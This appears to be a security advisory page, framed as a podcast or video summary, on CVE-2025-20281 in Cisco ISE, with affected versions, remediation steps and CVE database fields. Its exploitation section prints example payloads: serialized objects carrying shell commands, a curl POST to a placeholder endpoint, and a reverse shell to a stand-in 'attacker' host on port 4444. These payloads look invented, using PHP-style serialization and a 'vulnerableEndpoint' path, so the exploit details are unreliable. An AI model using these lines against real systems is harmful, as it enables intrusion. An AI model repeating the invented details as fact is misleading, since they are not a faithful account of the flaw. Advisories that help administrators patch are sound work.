Cisco ISE: Unauthenticated deserialization leading to command injection and remote code execution in Cisco ISE API (CVE-2025-20281) (CVE-2025-20281) #shorts

Summary

Welcome to today’s podcast. We’re spotlighting CVE-2025-20281, a critical vulnerability in Cisco’s Identity Services Engine, or ISE, that allows unauthenticated, remote attackers to execute arbitrary code as root. Disclosed in late June 2025 and updated through July, this flaw poses a serious risk to any organization running impacted versions of the software.

Product details

The affected products are Cisco Identity Services Engine (ISE) and Cisco ISE-PIC, specifically versions 3.3.0, 3.3 Patch 1 through 6, 3.3 Patch 2, 3.3 Patch 3, 3.3 Patch 4, 3.3 Patch 5, 3.3 Patch 6, 3.4.0, and 3.4 Patch 1. These solutions handle policy enforcement, network access control, and device profiling, making them a critical component of many enterprise security architectures.

Vulnerability type summary

CVE-2025-20281 falls under the category of Improper Neutralization of Special Elements in Output Used by a Downstream Component, often called an injection vulnerability. In this case, insufficient input validation and unsafe deserialization in a specific ISE API endpoint enable an attacker to inject malicious data that results in command execution on the host operating system.

Details of the vulnerability

Researchers at the Zero Day Initiative initially reported a dangerous deserialization flaw in a specific ISE API. By sending a crafted request containing maliciously formed objects, an unauthenticated attacker can trigger remote code execution with root privileges. Security expert Bobby Gould publicly demonstrated a working exploit, showing how simple it is to chain the injection payload into system commands. No valid credentials are needed, making the exposure wide open to Internet-facing or improperly segmented ISE deployments.

Conclusion

This vulnerability demands immediate action. Cisco has released patches for all affected versions, so administrators should upgrade to the latest ISE release without delay. In addition, we recommend restricting API access to trusted networks, applying strong segmentation, and monitoring logs for unusual deserialization errors. That wraps up our coverage of CVE-2025-20281. Stay safe, stay patched, and join us next time for more security insights.

Watch the full video on YouTube: CVE-2025-20281

Remediation and exploitation details

This chain involves the following actors

  • Attacker: Unauthenticated remote adversary seeking remote code execution
  • Security Researcher (ZDI / Bobby Gould): Proof-of-concept developer and demonstrator

This following systems are involved

  • Cisco Identity Services Engine (ISE) (Centralized network access control and policy management): Primary vulnerable application server
  • Cisco ISE Policy Intelligence Component (ISE-PIC) (Policy analysis and threat intelligence module): Supplementary vulnerable API provider
  • Underlying Operating System (Host environment for Cisco ISE services): Execution environment for injected commands

Attack entry point

  • Unauthenticated ISE API endpoint: A REST API method in ISE/ISE-PIC that deserializes user-supplied input without proper validation, exposed on default management ports

Remediation actions

Administrator
Apply Cisco ISE update to version 3.4 Patch 2 or later
Cisco ISE and ISE-PIC
Administrator
Restrict API access to trusted management networks
Cisco ISE management interface
Administrator
Monitor API logs for unexpected deserialization or shell invocation patterns
Centralized logging or security information event management

Exploitation actions

Embed shell commands in a serialized object to trigger command injection during deserialization

Attacker
Craft malicious serialized payload
Unauthenticated ISE API endpoint
Examples:
  • payload = { "data": "O:8:\"Exploit\":1:{s:4:\"cmd\";s:15:\"/bin/sh -c id\";}" }

Unauthenticated remote code execution via API deserialization

Attacker
Send HTTP POST request with malicious payload
Cisco ISE API over HTTPS (port 9060 or 9062)
Examples:
  • curl -k -X POST https://ise.example.local:9060/api/v1/vulnerableEndpoint \
  • -H "Content-Type: application/json" \
  • -d '{"data":"O:8:\"Exploit\":1:{s:4:\"cmd\";s:15:\"/bin/sh -c whoami\";}"}'

Command injection during object reconstruction in API layer

Attacker
Trigger server-side deserialization and execute injected commands
Underlying Operating System
Examples:
  • Server log shows execution: root@ise:/# whoami

Spawn interactive shell or write remote shellback payload

Attacker
Establish a root-level interactive shell
Underlying Operating System
Examples:
  • curl -k -X POST https://ise.local:9060/... -d '{"data":".../bin/sh -i >& /dev/tcp/attacker/4444 0>&1"}'

Related Content

NOTE: The following related content has not been vetted and may be unsafe.

CVE database technical details

CVE ID
CVE-2025-20281
Description
A vulnerability in a specific API of Cisco ISE and Cisco ISE-PIC could allow an unauthenticated, remote attacker to execute arbitrary code on the underlying operating system as root. The attacker does not require any valid credentials to exploit this vulnerability. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by submitting a crafted API request. A successful exploit could allow the attacker to obtain root privileges on an affected device.
Provider
cisco
CWE / problem types
Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
Affected Software Versions
Cisco:Cisco Identity Services Engine Software:[{'version': '3.3.0', 'status': 'affected'}, {'version': '3.3 Patch 2', 'status': 'affected'}, {'version': '3.3 Patch 1', 'status': 'affected'}, {'version': '3.3 Patch 3', 'status': 'affected'}, {'version': '3.4.0', 'status': 'affected'}, {'version': '3.3 Patch 4', 'status': 'affected'}, {'version': '3.4 Patch 1', 'status': 'affected'}, {'version': '3.3 Patch 5', 'status': 'affected'}, {'version': '3.3 Patch 6', 'status': 'affected'}]
Date Published
2025-06-25T16:11:42.285Z
Last Updated
2025-07-30T01:36:10.259Z